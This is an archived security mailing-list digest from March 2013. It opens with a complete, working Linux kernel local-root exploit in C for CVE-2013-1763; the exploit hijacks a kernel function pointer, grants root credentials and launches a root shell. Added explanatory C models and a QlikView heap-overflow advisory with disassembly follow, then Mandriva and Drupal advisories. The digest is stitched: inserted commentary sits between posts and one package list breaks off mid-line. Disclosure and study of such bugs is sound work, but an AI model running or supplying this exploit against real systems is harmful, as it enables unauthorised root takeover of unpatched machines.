Re: [Full-disclosure] CVE-2013-1763 Ubuntu 12.10 64bit

2013-03-13 Thread Thiébaud Weksteen

Hi,

Any particular reason for using flow_cache_global->percpu instead of
nl_table->rehash_time as in the original exploit? It just seems less
reliable.

Here is the PoC for Fedora 18 x86_64, using nl_table.

tweek

 Original Message 
Subject: [Full-disclosure] CVE-2013-1763 Ubuntu 12.10 64bit
Date: Mon, 11 Mar 2013 15:50:03 +0100
From: Kacper Szczesniak kac...@qwe.pl
To: full-disclosure@lists.grok.org.uk

Hi All,

Didn't find a working poc for 64bit Ubuntu so I wrote a quick mockup.

kacper
/*
 * CVE-2013-1763 SOCK_DIAG bug in kernel 3.3-3.8
 * This exploit uses nl_table to jump to a known location
 *
 * The bug: the SOCK_DIAG_BY_FAMILY path indexes the sock_diag_handlers[]
 * pointer array with the request's 8-bit sdiag_family without checking it
 * against AF_MAX, so a family past the end of the array makes the kernel
 * treat the next object in .bss as a handler. The index below is chosen so
 * that object is the nl_table pointer; the kernel then calls hndl->dump,
 * i.e. the value 8 bytes into nl_table[0], which is user memory mapped below.
 *
 * Needs: /proc/kallsyms showing real addresses (kptr_restrict = 0), a
 * non-PIE build so kernel_code() sits in the low 2 GiB (the stub loads it
 * with a sign-extended imm32), and a CPU without SMEP, which would fault on
 * executing a user page from ring 0.
 */

#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <netinet/tcp.h>
#include <errno.h>
#include <linux/if.h>
#include <linux/filter.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <linux/sock_diag.h>
#include <linux/inet_diag.h>
#include <linux/unix_diag.h>
#include <sys/mman.h>

/* regparm(3) is ignored on x86_64 (gcc warns); kept from the original. */
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
unsigned long sock_diag_handlers, nl_table;

/* Runs in kernel context as the bogus hndl->dump: give this task root creds. */
int __attribute__((regparm(3)))
kernel_code(void)
{
    commit_creds(prepare_kernel_cred(0));
    return -1;
}

/* Resolve a kernel symbol from /proc/kallsyms. With kptr_restrict >= 1 an
 * unprivileged reader sees all-zero addresses and every lookup returns 0. */
unsigned long
get_symbol(char *name)
{
    FILE *f;
    unsigned long addr;
    char dummy, sym[512];
    int ret = 0;

    f = fopen("/proc/kallsyms", "r");
    if (!f) {
        return 0;
    }

    while (ret != EOF) {
        ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sym);
        if (ret == 0) {
            fscanf(f, "%s\n", sym);
            continue;
        }
        if (!strcmp(name, sym)) {
            printf("[+] resolved symbol %s to %p\n", name, (void *) addr);
            fclose(f);
            return addr;
        }
    }
    fclose(f);

    return 0;
}

int main(int argc, char *argv[])
{
    int fd;
    unsigned family;
    struct {
        struct nlmsghdr nlh;
        struct unix_diag_req r;
    } req;

    if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0) {
        printf("Can't create sock diag socket\n");
        return -1;
    }

    memset(&req, 0, sizeof(req));
    req.nlh.nlmsg_len = sizeof(req);
    req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
    req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
    req.nlh.nlmsg_seq = 123456;

    req.r.udiag_states = -1;
    req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;

    commit_creds = (_commit_creds) get_symbol("commit_creds");
    prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
    sock_diag_handlers = get_symbol("sock_diag_handlers");
    nl_table = get_symbol("nl_table");

    if (!prepare_kernel_cred || !commit_creds || !sock_diag_handlers || !nl_table) {
        printf("some symbols are not available!\n");
        exit(1);
    }

    /* sdiag_family indexes sock_diag_handlers[] (8-byte pointers) with no
     * range check; this index makes the "handler" the nl_table variable. */
    family = (nl_table - sock_diag_handlers) / 8;
    printf("family=%u\n", family);
    req.r.sdiag_family = family;

    /* sdiag_family is a __u8, so nl_table must lie within 255 slots. */
    if (family > 255) {
        printf("nl_table is too far!\n");
        exit(1);
    }

    /* The kernel calls hndl->dump, the 8-byte value at nl_table[0] + 8: the
     * NETLINK_ROUTE hash's rehash_time. jiffies starts at -300*HZ and a
     * rehash stamps jiffies + 10 min, so on a recently booted x86_64 box that
     * value sits just above 4 GiB. Map a 2 MiB NOP sled there with the stub
     * at its end. (Constants restored here; the archived copy of this post
     * had dropped their zeros.) */
    unsigned long mmap_start, mmap_size;
    mmap_start = 0x100000000UL;
    mmap_size = 0x200000;
    printf("mmapping at 0x%lx, size = 0x%lx\n", mmap_start, mmap_size);

    if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,
             MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
        printf("mmap fault\n");
        exit(1);
    }
    memset((void*)mmap_start, 0x90, mmap_size);     /* NOP sled */

    /* Stub the sled slides into: call kernel_code() and return to the kernel. */
    char jump[] = "\x55"                            // push %rbp
                  "\x48\x89\xe5"                    // mov %rsp, %rbp
                  "\x48\xc7\xc0\x00\x00\x00\x00"    // mov $imm32, %rax (sign-extended; patched below)
                  "\xff\xd0"                        // call *%rax
                  "\x5d"                            // pop %rbp
                  "\xc3";                           // ret

    unsigned int *asd = (unsigned int *) &jump[7];
    *asd = (unsigned int)(unsigned long) kernel_code;
    printf("kernel_code = %x\n", (unsigned int)(unsigned long) kernel_code);

    memcpy((void *)(mmap_start + mmap_size - sizeof(jump)), jump, sizeof(jump));

    if (send(fd, &req, sizeof(req), 0) < 0) {
        printf("bad send\n");
        close(fd);
        return -1;
    }

    printf("uid=%d, euid=%d\n", getuid(), geteuid());

    if (!getuid())
        system("/bin/sh");

    return 0;
}

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
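The lookup the PoC above abuses, as an added example in user-space C (not code from the post, from either author, or from the kernel): a model of sock_diag_handlers[] with an unrelated pointer placed directly after it, the vulnerable lookup that indexes the array with an unchecked 8-bit family, and the fixed lookup with the AF_MAX range check that the upstream patch added. AF_MAX_MODEL, the struct and variable names, and the sample rehash_time value are assumptions made for the model; the index arithmetic is the one the PoC does with the two kallsyms addresses, done here with the model's own addresses.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define AF_MAX_MODEL 41          /* stands in for AF_MAX on the affected kernels */

/* Mirrors struct sock_diag_handler: an 8-bit family, then the dump callback. */
struct diag_handler {
    uint8_t family;
    int (*dump)(void);
};

static int dump_unix(void) { return 0; }
struct diag_handler unix_handler = { 1, dump_unix };

/* First two fields of nl_table[0].hash: the bucket array and rehash_time. */
struct nl_table_model {
    void *table;
    unsigned long rehash_time;
};
/* Constructed sample: a jiffies-derived stamp just above 4 GiB. */
struct nl_table_model fake_nl_table0 = { NULL, 0x1000493e0UL };

/* Constructed .bss layout: the handler table followed directly by the
 * nl_table pointer, as on the targeted kernels. */
struct bss_model {
    struct diag_handler *handlers[AF_MAX_MODEL];
    struct nl_table_model *nl_table;
} bss = {
    .handlers = { [1] = &unix_handler },
    .nl_table = &fake_nl_table0,
};

/* Vulnerable lookup: same shape as the pre-fix sock_diag_lock_handler(),
 * indexing with the request's __u8 sdiag_family and no range check. */
struct diag_handler *lookup_vuln(uint8_t family)
{
    return bss.handlers[family];
}

/* Fixed lookup: reject families at or beyond the table before touching it. */
struct diag_handler *lookup_fixed(uint8_t family)
{
    if (family >= AF_MAX_MODEL)
        return NULL;
    return bss.handlers[family];
}

/* The PoC's (nl_table - sock_diag_handlers) / 8, on the model's addresses. */
unsigned family_for_neighbour(void)
{
    return (unsigned)(((uintptr_t)&bss.nl_table -
                       (uintptr_t)bss.handlers) / sizeof(void *));
}

/* What the kernel would read as hndl->dump for a given family: the bytes at
 * the dump offset of whatever lookup_vuln() returned. memcpy avoids reading
 * the nl_table object through the wrong type. */
unsigned long misread_dump_target(uint8_t family)
{
    const char *h = (const char *)lookup_vuln(family);
    unsigned long target;

    memcpy(&target, h + offsetof(struct diag_handler, dump), sizeof target);
    return target;
}

int main(void)
{
    unsigned family = family_for_neighbour();

    printf("family=%u\n", family);
    printf("vulnerable lookup returns %p, nl_table pointer is %p\n",
           (void *)lookup_vuln((uint8_t)family), (void *)bss.nl_table);
    printf("it would then call dump at 0x%lx (nl_table[0].hash.rehash_time)\n",
           misread_dump_target((uint8_t)family));
    printf("fixed lookup returns %p\n", (void *)lookup_fixed((uint8_t)family));
    return 0;
}
```

The model shows why the PoC's `family > 255` check exists: sdiag_family is a byte, so the pointer it wants to borrow must sit within 255 slots of the table, which is a property of the kernel's .bss layout rather than anything the attacker controls.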

[Full-disclosure] SEC Consult SA-20130313-0 :: QlikView Desktop Client Integer Overflow

2013-03-13 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20130313-0 >
=======================================================================
              title: QlikView Desktop Client Integer Overflow
            product: QlikView Desktop Client
 vulnerable version: 11.00 SR2
      fixed version: 11.20 SR1
                CVE:
             impact: High
           homepage: http://www.qlikview.com/
              found: 2012-10-22
                 by: A. Antukh, M. Lucinskij
                     SEC Consult Vulnerability Lab
                     https://www.sec-consult.com
=======================================================================

Vendor description:
---
QlikView is a new kind of business intelligence software that changes
your world. It's BI software that lets you stop guessing and start knowing
how to make faster, smarter decisions.

Source: http://www.qlikview.com/us/explore


Vulnerability overview/description:
---
An integer overflow vulnerability exists in the .qvw file format parser.
The parameter that gives a section's length is checked with a signed
comparison, so any value of 0x80000000 or above passes the check and causes
a heap overflow.

Successful exploitation of this vulnerability could result in an arbitrary 
code execution within the QlikView Desktop client.



Vulnerability details:
--
The .qvw file is divided into several sections with a specified delimiter.
Among others, there is a parameter which is responsible for defining the
section length. On the hex listing below it's the DWORD A4 00 00 00 (address
315EF)

000315B0:  00 00 01 00-00 00 0E 23-23 23 23 23-23 23 23 23
000315C0:  23 23 23 23-23 01 2E 00-00 00 00 00-00 00 00 00
000315D0:  00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 03
000315E0:  00 00 00 00-00 00 00 90-02 00 00 00-00 04 00 A4
000315F0:  00 00 00 78-9C 3D CC CB-4A 02 50 14-86 D1 1F 47

If for any reason the value is bigger than the actual size of the section,
the error is handled by a C++ exception handler and the message "Document
failed to load" is shown. The check can be seen here:

.text:00D6BD66                 mov     eax, [edi+28h]
.text:00D6BD69                 mov     ebx, [eax]          ; here is the length parameter
.text:00D6BD6B                 add     eax, 4
.text:00D6BD6E                 mov     [edi+28h], eax
.text:00D6BD71                 cmp     ebx, [ebp+var_14]
.text:00D6BD74                 jg      loc_D6BBAC          ; check if the parameter value
                                                           ; is bigger than actual length

However, the comparison is a signed one (jg) and there is no check for a
negative value. In other words, if an attacker supplies a DWORD of
0x80000000 or above, the jump will not be taken, as the number is treated as
negative, and the oversized length survives the check. After that, the length
parameter is used as the DstSize argument to the CArchive::Read function:

.text:00D6BD7A                 mov     eax, [ebp+Dst]
.text:00D6BD7D                 push    ebx                 ; DstSize
.text:00D6BD7E                 push    eax                 ; Dst
.text:00D6BD7F                 mov     ecx, edi
.text:00D6BD81                 call    ?Read@CArchive@@QAEIPAXI@Z ; CArchive::Read(void *,uint)

A large amount of data is read. It is used later to fill the created Archive
whose size is 0x8000:
 
.text:00B26207                 push    0
.text:00B26209                 push    8000h
.text:00B2620E                 push    1
.text:00B26210                 lea     eax, [ebp+var_60]
.text:00B26213                 push    eax
.text:00B26214                 lea     ecx, [ebp+var_A8]
.text:00B2621A                 call    ??0CArchive@@QAE@PAVCFile@@IHPAX@Z ; CArchive::CArchive(CFile *,uint,int,void *)

This results in the controlled address being overwritten with the controlled
value.

.text:009F3092                 mov     ecx, [esi]
.text:009F3094                 mov     edx, [esi+4]
.text:009F3097                 mov     [ecx+4], edx        ; here the error occurs:
.text:009F3097                                             ; trying to write at a non-existing address

An extract from a debugger at the occurrence of the error is presented below.

eax=04735f14 ebx=00000000 ecx=bbbbbbb7 edx=aaaaaaa6 esi=04b2fbc0 edi=04735f10
eip=01723097 esp=003527f8 ebp=00352818 iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010216
Qv+0x5f3097:
01723097 895104          mov     dword ptr [ecx+4],edx ds:002b:bbbbbbbb=????????



Vulnerable / tested versions:
-
The vulnerability has been verified to exist in QlikView 11.00 SR2, 
which was the most recent version at the time of discovery.



Vendor contact timeline:

2012-11-08: Contacted vendor through supp...@qlikview.com
2012-11-12: Initial vendor response - issue will be verified
2012-12-13
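The check the advisory describes, as an added example in C (not SEC Consult's or QlikView's code): the signed comparison behind the cmp/jg sequence beside an unsigned one, run over constructed section headers that include the 0xA4 length from the hex dump. The header layout assumed here (a little-endian DWORD length at the start of the section, followed by the payload), the remaining-size value, and the function names are assumptions made for the example.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#define SECTION_LEFT 0x1000u   /* assumed bytes left in the section (var_14) */
#define ARCHIVE_BUF  0x8000u   /* CArchive buffer size from the listing */

/* Constructed sample headers: the DWORD length at the start of a section. */
const uint8_t HDR_OK[4]  = { 0xA4, 0x00, 0x00, 0x00 };  /* 0xA4, as in the dump */
const uint8_t HDR_BIG[4] = { 0x00, 0x20, 0x00, 0x00 };  /* 0x2000: over-long, positive */
const uint8_t HDR_NEG[4] = { 0x01, 0x00, 0x00, 0x80 };  /* 0x80000001: top bit set */

static uint32_t le32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Vulnerable form, mirroring "cmp ebx,[ebp+var_14] / jg": both operands are
 * signed, so a length with the top bit set compares as negative, passes, and
 * is handed to Read() as DstSize. Returns 0 and the accepted size, or -1. */
int section_len_vuln(const uint8_t *hdr, size_t remaining, uint32_t *dst_size)
{
    int32_t len = (int32_t)le32(hdr);
    int32_t actual = (int32_t)remaining;

    if (len > actual)
        return -1;
    *dst_size = (uint32_t)len;
    return 0;
}

/* Hardened form: an unsigned comparison rejects every length above what the
 * section actually holds, whatever the top bit says. */
int section_len_fixed(const uint8_t *hdr, size_t remaining, uint32_t *dst_size)
{
    uint32_t len = le32(hdr);

    if (len > remaining)
        return -1;
    *dst_size = len;
    return 0;
}

/* Convenience for the driver and tests: the accepted DstSize, or -1. */
long long accepted_dst_size(int use_fixed, const uint8_t *hdr)
{
    uint32_t n = 0;
    int rc = use_fixed ? section_len_fixed(hdr, SECTION_LEFT, &n)
                       : section_len_vuln(hdr, SECTION_LEFT, &n);

    return rc == 0 ? (long long)n : -1;
}

int main(void)
{
    const uint8_t *hdrs[] = { HDR_OK, HDR_BIG, HDR_NEG };
    const char *names[] = { "0xA4", "0x2000", "0x80000001" };

    for (size_t i = 0; i < 3; i++) {
        long long v = accepted_dst_size(0, hdrs[i]);
        long long f = accepted_dst_size(1, hdrs[i]);

        printf("length %-11s signed check: %s", names[i],
               v < 0 ? "rejected" : "accepted");
        if (v > ARCHIVE_BUF)
            printf(" (DstSize 0x%llx > 0x%x archive buffer: overflow)", v, ARCHIVE_BUF);
        printf("; unsigned check: %s\n", f < 0 ? "rejected" : "accepted");
    }
    return 0;
}
```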

[Full-disclosure] [ MDVSA-2013:022 ] openssh

2013-03-13 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2013:022
 http://www.mandriva.com/en/support/security/
 ___

 Package : openssh
 Date: March 13, 2013
 Affected: Enterprise Server 5.0
 ___

 Problem Description:

 Multiple vulnerabilities have been found and corrected in openssh:
 
 The auth_parse_options function in auth-options.c in sshd in OpenSSH
 before 5.7 provides debug messages containing authorized_keys command
 options, which allows remote authenticated users to obtain potentially
 sensitive information by reading these messages, as demonstrated by
 the shared user account required by Gitolite.  NOTE: this can cross
 privilege boundaries because a user account may intentionally have no
 shell or filesystem access, and therefore may have no supported way to
 read an authorized_keys file in its own home directory (CVE-2012-0814).
 
 The default configuration of OpenSSH through 6.1 enforces a fixed
 time limit between establishing a TCP connection and completing a
 login, which makes it easier for remote attackers to cause a denial
 of service (connection-slot exhaustion) by periodically making many
 new TCP connections (CVE-2010-5107).
 
 The updated packages have been patched to correct these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5107
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0814
 ___

 Updated Packages:

 Mandriva Enterprise Server 5:
 d4dc59e94c2f0f4ca4ed3d29c05afd9d  mes5/i586/openssh-5.1p1-2.3mdvmes5.2.i586.rpm
 6bb053a5d82451594d433c0059c5f7a7  
mes5/i586/openssh-askpass-5.1p1-2.3mdvmes5.2.i586.rpm
 cc26585ed65704d2fa6c0bcb102953c7  
mes5/i586/openssh-askpass-common-5.1p1-2.3mdvmes5.2.i586.rpm
 06ded6e5614c7a188a676550934e98bb  
mes5/i586/openssh-askpass-gnome-5.1p1-2.3mdvmes5.2.i586.rpm
 860932e1a599ec68a150879b9c9abe52  
mes5/i586/openssh-clients-5.1p1-2.3mdvmes5.2.i586.rpm
 fe26afea6473e680a45979a904bb7e3d  
mes5/i586/openssh-server-5.1p1-2.3mdvmes5.2.i586.rpm 
 baa4beb7bfb76b7706166e7870ddd210  mes5/SRPMS/openssh-5.1p1-2.3mdvmes5.2.src.rpm

 Mandriva Enterprise Server 5/X86_64:
 1c43725b46c279b7295c16e0fb9f43bf  
mes5/x86_64/openssh-5.1p1-2.3mdvmes5.2.x86_64.rpm
 d0231e13471148dfed86f75c4f99a2d0  
mes5/x86_64/openssh-askpass-5.1p1-2.3mdvmes5.2.x86_64.rpm
 2c06080b369ab13a9c95df47336aeb13  
mes5/x86_64/openssh-askpass-common-5.1p1-2.3mdvmes5.2.x86_64.rpm
 9fc99fb86e43c00139329787c7b3829d  
mes5/x86_64/openssh-askpass-gnome-5.1p1-2.3mdvmes5.2.x86_64.rpm
 63621dfc8b9c4bf731711af418ea5c5f  
mes5/x86_64/openssh-clients-5.1p1-2.3mdvmes5.2.x86_64.rpm
 ea5653a3e6d790ce02f11fbcd722801d  
mes5/x86_64/openssh-server-5.1p1-2.3mdvmes5.2.x86_64.rpm 
 baa4beb7bfb76b7706166e7870ddd210  mes5/SRPMS/openssh-5.1p1-2.3mdvmes5.2.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/en/support/security/advisories/

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)

iD8DBQFRQFi+mqjQ0CJFipgRAuIuAJ9D6e15JXI7YDeAIZqQalKdXEmEWwCgjBoe
quBwSmmMLE/orEkpMzGwKbQ=
=PJAx
-END PGP SIGNATURE-



[Full-disclosure] [ MDVSA-2013:023 ] coreutils

2013-03-13 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2013:023
 http://www.mandriva.com/en/support/security/
 ___

 Package : coreutils
 Date: March 13, 2013
 Affected: Enterprise Server 5.0
 ___

 Problem Description:

 Multiple vulnerabilities have been found and corrected in coreutils:
 
 Long line inputs could trigger a segfault in the sort, uniq and join
 utilities (CVE-2013-0221, CVE-2013-0222, CVE-2013-0223).
 
 The updated packages have been patched to correct these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0221
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0222
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0223
 https://bugzilla.novell.com/show_bug.cgi?id=798538
 https://bugzilla.novell.com/show_bug.cgi?id=796243
 https://bugzilla.novell.com/show_bug.cgi?id=798541
 ___

 Updated Packages:

 Mandriva Enterprise Server 5:
 e119161cd57b34c1faa1116167fd2dee  
mes5/i586/coreutils-6.12-2.6mdvmes5.2.i586.rpm
 dd979ecd771a2703e881595814e6eb17  
mes5/i586/coreutils-doc-6.12-2.6mdvmes5.2.i586.rpm 
 9861a796e1eaaa130e175e9660ad0711  
mes5/SRPMS/coreutils-6.12-2.6mdvmes5.2.src.rpm

 Mandriva Enterprise Server 5/X86_64:
 64f630d1e0fc0f97aec572a1f1f6f48f  
mes5/x86_64/coreutils-6.12-2.6mdvmes5.2.x86_64.rpm
 c3a94ab9eaebfad4bd1cbffe8f3cb10b  
mes5/x86_64/coreutils-doc-6.12-2.6mdvmes5.2.x86_64.rpm 
 9861a796e1eaaa130e175e9660ad0711  
mes5/SRPMS/coreutils-6.12-2.6mdvmes5.2.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/en/support/security/advisories/

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)

iD8DBQFRQHMQmqjQ0CJFipgRAgRQAJ0W+wyHdG5tk7XAQGJsZL4KON0zCgCgvwf4
rZJBw2UBarl1PaG56D3eoqA=
=5ffG
-END PGP SIGNATURE-



[Full-disclosure] [ MDVSA-2013:024 ] firefox

2013-03-13 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2013:024
 http://www.mandriva.com/en/support/security/
 ___

 Package : firefox
 Date: January 13, 2013
 Affected: Enterprise Server 5.0
 ___

 Problem Description:

 A security issue was identified and fixed in mozilla firefox:
 
 VUPEN Security, via TippingPoint's Zero Day Initiative, reported a
 use-after-free within the HTML editor when content script is run by
 the document.execCommand() function while internal editor operations
 are occurring. This could allow for arbitrary code execution
 (CVE-2013-0787).
 
 The mozilla firefox packages have been upgraded to the latest ESR
 version, which is unaffected by this security flaw.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0787
 http://www.mozilla.org/security/announce/2013/mfsa2013-29.html
 ___

 Updated Packages:

 Mandriva Enterprise Server 5:
 2c37f101824b6a75260d6be2ba6526f4  
mes5/i586/firefox-17.0.4-0.1mdvmes5.2.i586.rpm
 067ef1b5cb43e108598783bb2ca3e904  
mes5/i586/firefox-af-17.0.4-0.1mdvmes5.2.i586.rpm
 a9b33290ee48559ab9bf552c11a77867  
mes5/i586/firefox-ar-17.0.4-0.1mdvmes5.2.i586.rpm
 56eede1229650b50f838c4d62cf3088f  
mes5/i586/firefox-be-17.0.4-0.1mdvmes5.2.i586.rpm
 2f1ed6761c118ca1d499c996c267fd5c  
mes5/i586/firefox-bg-17.0.4-0.1mdvmes5.2.i586.rpm
 0af0df661fdf99dce981a34105bf3db2  
mes5/i586/firefox-bn-17.0.4-0.1mdvmes5.2.i586.rpm
 4fbacdfae22286a4d1565f5e07a99e59  
mes5/i586/firefox-ca-17.0.4-0.1mdvmes5.2.i586.rpm
 3ea6ca41d6d738d7b8fbb285e78d06f7  
mes5/i586/firefox-cs-17.0.4-0.1mdvmes5.2.i586.rpm
 7735a4756a43b940cd288f486e7d2de9  
mes5/i586/firefox-cy-17.0.4-0.1mdvmes5.2.i586.rpm
 9bec5943921b3bddcc4e3497d027fc2d  
mes5/i586/firefox-da-17.0.4-0.1mdvmes5.2.i586.rpm
 0b9041b5eaf52e7e06dd3437626620a4  
mes5/i586/firefox-de-17.0.4-0.1mdvmes5.2.i586.rpm
 5cc0c1b6523e17c8d79d678d7d7aad53  
mes5/i586/firefox-devel-17.0.4-0.1mdvmes5.2.i586.rpm
 e9a01322cd40f797ba03b52d58671b86  
mes5/i586/firefox-el-17.0.4-0.1mdvmes5.2.i586.rpm
 22cc5f00f67563a7734bdced5e1d7bfb  
mes5/i586/firefox-en_GB-17.0.4-0.1mdvmes5.2.i586.rpm
 0aebbb068c1d4d85b1b2827d5b5b2431  
mes5/i586/firefox-eo-17.0.4-0.1mdvmes5.2.i586.rpm
 a57a4e00740b7babfcb51b0328fc135f  
mes5/i586/firefox-es_AR-17.0.4-0.1mdvmes5.2.i586.rpm
 9710fd28c150da0eb976fa8347b9cd86  
mes5/i586/firefox-es_ES-17.0.4-0.1mdvmes5.2.i586.rpm
 e66547fd26bd582df43ff480895f6674  
mes5/i586/firefox-et-17.0.4-0.1mdvmes5.2.i586.rpm
 90e1a82354eb2aee9eba6b0bdc4dda92  
mes5/i586/firefox-eu-17.0.4-0.1mdvmes5.2.i586.rpm
 32e588d40734ae29f2fc84c37f4468ea  
mes5/i586/firefox-fi-17.0.4-0.1mdvmes5.2.i586.rpm
 4140a4088ffb39522548b24f1294d752  
mes5/i586/firefox-fr-17.0.4-0.1mdvmes5.2.i586.rpm
 1202edce26a621ee77e458766e2c9026  
mes5/i586/firefox-fy-17.0.4-0.1mdvmes5.2.i586.rpm
 6099e1f5dd1b0529b205a89327169aed  
mes5/i586/firefox-ga_IE-17.0.4-0.1mdvmes5.2.i586.rpm
 13818d623506c2f2c94752c54d4b379d  
mes5/i586/firefox-gl-17.0.4-0.1mdvmes5.2.i586.rpm
 bf5e73d3f9b7aeb7d6b4d32751615211  
mes5/i586/firefox-gu_IN-17.0.4-0.1mdvmes5.2.i586.rpm
 a324f1da21be53ce595dcbb446a3f95f  
mes5/i586/firefox-he-17.0.4-0.1mdvmes5.2.i586.rpm
 efd3a7d1712e3c49a5105f8568bf3413  
mes5/i586/firefox-hi-17.0.4-0.1mdvmes5.2.i586.rpm
 a47c70e2a0af9886942f7b8b36aae01d  
mes5/i586/firefox-hu-17.0.4-0.1mdvmes5.2.i586.rpm
 dee1f90622dcc9e52ec07b92132a73bf  
mes5/i586/firefox-id-17.0.4-0.1mdvmes5.2.i586.rpm
 5f63f198f5a332a65029ec6773339087  
mes5/i586/firefox-is-17.0.4-0.1mdvmes5.2.i586.rpm
 be0fb5af91ead3cc9e659ca36d6907ce  
mes5/i586/firefox-it-17.0.4-0.1mdvmes5.2.i586.rpm
 75466d58f640181559cf203f9766e223  
mes5/i586/firefox-ja-17.0.4-0.1mdvmes5.2.i586.rpm
 f0be98911d65cf3d9f0ccba7eb39861a  
mes5/i586/firefox-kn-17.0.4-0.1mdvmes5.2.i586.rpm
 20ec7397f0df85a5821df4c2ab698671  
mes5/i586/firefox-ko-17.0.4-0.1mdvmes5.2.i586.rpm
 b9237e59391bc7f9f82bcb798b2e5822  
mes5/i586/firefox-ku-17.0.4-0.1mdvmes5.2.i586.rpm
 991acfb783d2088c74f6cef901be39eb  
mes5/i586/firefox-lt-17.0.4-0.1mdvmes5.2.i586.rpm
 de4073f73eee8d334746cc8bf897197a  
mes5/i586/firefox-lv-17.0.4-0.1mdvmes5.2.i586.rpm
 da1fd3d4c29ac26717fae391779b931a  
mes5/i586/firefox-mk-17.0.4-0.1mdvmes5.2.i586.rpm
 7e306e1eb4301b80f6d21b9a836f1f16  
mes5/i586/firefox-mr-17.0.4-0.1mdvmes5.2.i586.rpm
 8b776ce85ce48c83210417dc0963615b  
mes5/i586/firefox-nb_NO-17.0.4-0.1mdvmes5.2.i586.rpm
 68006e43d84cc0ed69b03f15bdfd21c0  
mes5/i586/firefox-nl-17.0.4-0.1mdvmes5.2.i586.rpm
 0aaac65bb81de7df1915f719721b9bde  
mes5/i586/firefox-nn_NO-17.0.4-0.1mdvmes5.2.i586.rpm
 a36ca1ab708abfbf97dfe15ffbcd70c4  

[Full-disclosure] [Security-news] SA-CONTRIB-2013-034 - Node Parameter Control - Access Bypass

2013-03-13 Thread security-news
View online: http://drupal.org/node/1942330

  * Advisory ID: DRUPAL-SA-CONTRIB-2013-034
  * Project: Node Parameter Control [1] (third-party module)
  * Version: 6.x
  * Date: 2013-Mar-13
  * Security risk: Critical [2]
  * Exploitable from: Remote
  * Vulnerability: Access bypass

 DESCRIPTION  
-

This module enables you to limit the visibility of the fields on the node
edit form.
The module does not sufficiently check access before allowing users to view
and edit the configuration options, so anonymous and authenticated users are
able to view and edit them.


 CVE IDENTIFIER(S) ISSUED  


  * /A CVE identifier [3] will be requested, and added upon issuance, in
accordance with Drupal Security Team processes./

 VERSIONS AFFECTED  
---

  * All 6.x-1.x versions

Drupal core is not affected. If you do not use the contributed Node Parameter
Control [4] module, there is nothing you need to do.

 SOLUTION  


Uninstall the module. No patched version is available.

Also see the Node Parameter Control [5] project page.

 REPORTED BY  
-

  * Talbot [6]

 FIXED BY  


The module maintainer opted to mark the module as unsupported.

 COORDINATED BY  
--

  * Lee Rowlands [7] of the Drupal Security Team

 CONTACT AND MORE INFORMATION  


The Drupal security team can be reached at security at drupal.org or via the
contact form at http://drupal.org/contact [8].

Learn more about the Drupal Security team and their policies [9], writing
secure code for Drupal [10], and securing your site [11].


[1] http://drupal.org/project/node_parameter_control
